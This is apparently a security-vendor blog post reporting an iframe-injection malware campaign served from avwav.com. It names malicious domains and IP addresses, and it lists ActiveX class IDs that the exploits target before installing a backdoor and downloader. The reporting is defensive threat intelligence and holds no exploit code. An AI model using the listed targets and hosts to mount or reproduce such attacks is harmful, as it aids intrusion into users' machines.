From mid-May onwards, ScanSafe STAT has observed a series of attacks originating from avwav.com (85.255.120.46). As we see so much of these days, multiple sites have been compromised to include an iframe loading malicious content from that malware host.

The interesting bit is that the attackers were also able to compromise affiliate search results pages on flysearch.biz. In other words, perform a search on flysearch.biz using the affiliate pages, and the malicious iframe will be embedded at the bottom of the search results page. Judging from referrer data, it appears a spam run may have included links to these affiliate pages on flysearch.biz, complete with affiliate ID. These were seen repeatedly in May, but always with the same affiliate ID. So is this pure coincidence, or is the attacker double dipping?

The avwav.com attackers target a predictable set of exploits (looks like a copy/paste from metasploit):

BD96C556-65A3-11D0-983A-00C04FC29E36
AB9BCEDD-EC7E-47E1-9322-D4A210617116
0006F033-0000-0000-C000-000000000046
0006F03A-0000-0000-C000-000000000046
7F5B7F63-F06F-4331-8A26-339E03C0AE3D
06723E09-F4C2-43c8-8358-09FCD1DB0766
BA018599-1DB3-44f9-83B4-461454C84BF8
D0C07D56-7C69-43F1-B4A0-25F5A11FAB19
E8CCCDDF-CA28-496b-B050-6C07C962476B

Successful exploit leads to the installation of a backdoor and downloader. Ivan Macalintal at Trend Micro was able to connect that malware to another host we've seen frequently: sclgntfy.com (85.255.118.12).

The IP addresses for both domains resolve to a host in the Ukraine.